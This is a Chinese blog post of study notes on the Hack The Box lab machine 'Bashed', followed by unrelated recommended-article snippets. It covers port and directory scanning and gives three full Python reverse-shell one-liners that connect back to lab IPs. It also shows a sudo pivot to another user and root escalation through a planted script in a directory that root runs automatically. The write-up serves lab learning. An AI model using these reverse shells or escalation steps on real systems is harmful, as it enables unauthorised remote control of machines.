python shell怎么重复输入上一行_【学习笔记】如何利用Python反弹shell

最新推荐文章于 2021-02-10 12:15:59 发布
最新推荐文章于 2021-02-10 12:15:59 发布
阅读量720 收藏
点赞数
文章标签: python shell怎么重复输入上一行

作者:whale

bashed

bashed是HTB网络实验室研究得出目前易受攻击的机器之一。

端口探测:

80/tcp open http Apache httpd 2.4.18 ((Ubuntu))

100/tcp filtered newacct

1500/tcp filtered vlsi-lm

web目录探测:

config.php: PHP配置文件数据库ID和密码

OSVDB-3268: /dev/: Directory indexing found.

OSVDB-3092: /dev/: This might be interesting...

OSVDB-3268: /php/: Directory indexing found.

OSVDB-3092: /php/: This might be interesting...

在dev/目录下找到php文件,尝试bash -i 反弹shell,失败,bash版本不适合。尝试nc -e反弹shell,nc版本不支持-e参数。

用python成功反弹了一个shell(shell 1)给kali。

kali上监听:

nc -lnvp 1234

网页上运行python命令:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.137",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

信息搜集:普通用户:

arrexel❌1000:1000:arrexel,,,:/home/arrexel:/bin/bashscriptmanager❌1001:1001:,,,:/home/scriptmanager:/bin/bash

内核版本:

Linux bashed 4.4.0-62-generic #83-Ubuntu SMP Wed Jan 18 14:10:15 UTC 2017 x8664 x8664 x86_64 GNU/Linux

系统版本:

Ubuntu 16.04.2 LTS \n \l

尝试内核漏洞提权。有内核漏洞,但gcc没有安装。

该怎么提权呢?

现在用户是www-data

尝试cd /home/arrexel,看到了user.txt,获取到flag。。

我还以为会有forbidden权限不够的情况。。。怎么回事,权限没划分好么?

可以看到有三列,都是r——read,分别对应”文件所有者、组群、非组群“,因为非组群的权限是read,所以可读。然后再尝试下rm删除,果然”rm: cannot remove 'a': Permission denied“

/home/scriptmanager目录下,有个脚本,说是检查linux提权的。运行后指出了一些可以运行的exp来提权

但是没有gcc,有exp也没用啊!writeup分享一波~

sudo -u username的用法

-u username不加此参数,代表要以root 的身份执行指令,而加了此参数,可以以 username 的身份执行指令(#uid 为该 username 的使用者号码)

用shell 1运行如下命令,得到shell 2

sudo -u scriptmanager python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.109",1235));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

用sudo反弹了一个scriptmanager用户的shell。在/scripts目录下,发现了它有root权限,于是我们在该目录下建立一个py脚本。

nc -lvnp 1236

touch pri.py

echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.137",1236));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' > pri.py

学习总结:

这个实验用了很多次python反弹shell。用sudo -u username可以用其他用户来运行命令。本次利用的scripts文件夹会自动运行常用的脚本,从而运行我们加入的反弹shell的py脚本。

但要注意:用户权限设置的注释下面,有一行NOPASSWD: ALL 说明用户使用sudo命令时,无需输入密码。

weixin_39847722
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Linux shell 编程学习笔记
01-07
一直以来都很像系统的学习一下 shell 脚本,以便方便的高效的管理服务器。 这次难得有时间和条件来学习,所以做好笔记。 一:shell 能做什么  二:shell 脚本的几种执行方式,我们创建文件 start.sh,并且赋予 ...
python shell怎么重复输入一行_如何在python解释器shell重复上次的命令?
weixin_39926613的博客
11-22 1304
45我使用以下命令启用python shell的历史记录。这是我的.pythonstartup文件。 PYTHONSTARTUP环境变量设置为此文件路径。# python startup fileimport readlineimport rlcompleterimport atexitimport os# tab completionreadline.parse_and_bind('tab: c...
python shell怎么重复输入一行_在Shell上提示时如何使python脚本按Enter键
weixin_39999116的博客
11-24 447
I want to automatize upgrade of a program.I run in Python this code:import subprocesssubprocess.call('./upgrade')When I do this, I get output from shell that Upgrade procedure started successfully, an...
python idle调出上一次输入
nlite827109223的博客
03-18 8864
alt + p
如何在交互式python重复最近输入
yexuanCat的博客
07-26 5417
问题描述:centos使用交互式python时按方向键显示「^[[C^[[D」等乱码解决方法pip install readline问题背景作者:涛吴 链接:https://www.zhihu.com/question/21518507/answer/18486781 来源:知乎 著作权归作者所有,转载请联系作者获得授权。一九七〇年代廉价的电子图像显示器出现之前,大型机的终端通常使用电传打字
Python基础教程学习笔记 第一章 基础知识
01-05
2、查看Python版本号,在Dos窗口输入python -V”查看版本号,注意V是大写字母,这条命令是Windows命令,而不是python shell的命令 3、让解释器只执行普通的除法运算:from __feture__ import division 4、执行...
Python os模块学习笔记
12-23
Python os模块包含普遍的操作系统功能。例如文件的复制、创建、修改、删除文件及文件夹… 二、常用方法 1、os.listdir() 返回指定目录下的所有文件和目录名。 2、os.remove() 删除一个文件。 3、os.system(&#...
基于python学习笔记(附代码)
02-08
这份学习笔记主要分为四个部分:Python语言、标准库、扩展库和附录。以下是对这些部分的详细说明: 第一部分:Python语言 这部分介绍了Python的基础概念和核心特性。Python是一种解释型语言,但它的执行过程涉及到...
Python3.4学习笔记之 idle 清屏扩展插件用法分析
01-20
这种方法只能在windows系统cmd模式下的python shell 才管用(因为cls的命令是针对cmd的),在python idle直接返回了一个0的值。 2.定义一个cls的函数,每次使用输入cls()即可 def cls(): print \
python像linux那样获取上一条输入的快捷键
心远未安
08-16 6178
获取上一条输入Alt+P 获取下一条输入Alt+N 笔者习惯使用'↑'和'↓',可以在的Options->configure IDEL->key更改
python怎么重复上一段命令_如何重复最后一个命令在python解释器shell
weixin_32236415的博客
02-04 1373
我使用以下启用python shell上的历史记录。这是我的.pythonstartup文件。 PYTHONSTARTUP环境变量设置为此文件路径。# python startup fileimport readlineimport rlcompleterimport atexitimport os# tab completionreadline.parse_and_bind('tab: comp...
01-复制上一行到下一行代码的快捷键
高调做事,低调做人!
07-25 1万+
ctrl+j
找回Python IDLE Shell里的历史命令(用上下键翻历史命令怎么不好用了呢?)
热门推荐
GarfieldEr007的专栏
03-05 1万+
习惯了终端的上下键调出历史命令之后,在Python IDLE的shell用上下键调不出历史命令,开始我还以为Python Shell不保存历史命令呢,后来发现是调历史命令的快捷键不对。 Python IDLE的shell调出历史命令的快捷键并不像常见的Unix/Linux/Windows终端/matlab等那种上下键方式,而是特有的Alt+P和Alt+N,分别向上(history previou
Oracle SPOOL命令和SAVE命令的区别和使用
VagetableOfPeng的博客
11-18 376
做实验做得我头疼。 我想要的是,sql指令保存在一个文件,通过调用sql文件,执行里面的指令。 SPOOL命令 但是好像走了弯路,把sql的运行结果保存到sql文件了 可以看到保存的是命令执行结果,不是我想要的 SAVE命令 实际上应该用SAVE命令 小结 SPOOL保存的是命令的执行结果 SAVE保存的是命令本身 ...
python跳转回上条命令_实现交互式shell的几种方式
weixin_29029673的博客
01-30 2064
文章最后更新时间为:2019年06月12日 00:56:19当我们拿到一个webshell的时候,我们能够执行一些命令,但是这些命令都是非交互的,也就是说不存在上下文的概念。当我们想使用vim、top等命令时,webshell就无能为力了。那我们怎么获取一个可交互的webshell呢?1. python pty 方式一般我们都会使用nc来接收反弹来的shell,只需要在目标上(以linux为例)执...
python怎么复制上面的语句_[语句摘要]复制Python的三种方法,总结,拷贝,方式
weixin_42136837的博客
02-10 779
在练习列表的操作的时候我发现赋值之后的列表会随着被赋值的列表改变而改变,就像是C语言用指向同一实际变量的指针进行操作一样。这是因为Python有三种拷贝方式:浅拷贝、深拷贝和赋值拷贝。赋值拷贝就像是定义新指针并指向了同一内存区域,对任意一个列表名进行操作,其他的也会变化。深拷贝的作用是完全拷贝一个列表A并赋值给另一列表B。以下是深度拷贝与列表操作的样例。记得在使用深拷贝的时候要引入copy包。...
学习Linux的小技巧----如何在Linux的CLI下快捷复制上一条指令
u012965683的博客
02-16 1万+
在Linux的命令行模式下我们经常会遇到即将输入的指令与上一条指令完全一致,而这时如果命令过于复杂或者为了节约时间提高效率,使用快捷键方式重复上一条指令。 以下列出四种常见的快捷键方式: ①Ctrl + P 这样的组合键 ②键盘的向上的方向键↑ ③ !! ④ ! -1
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值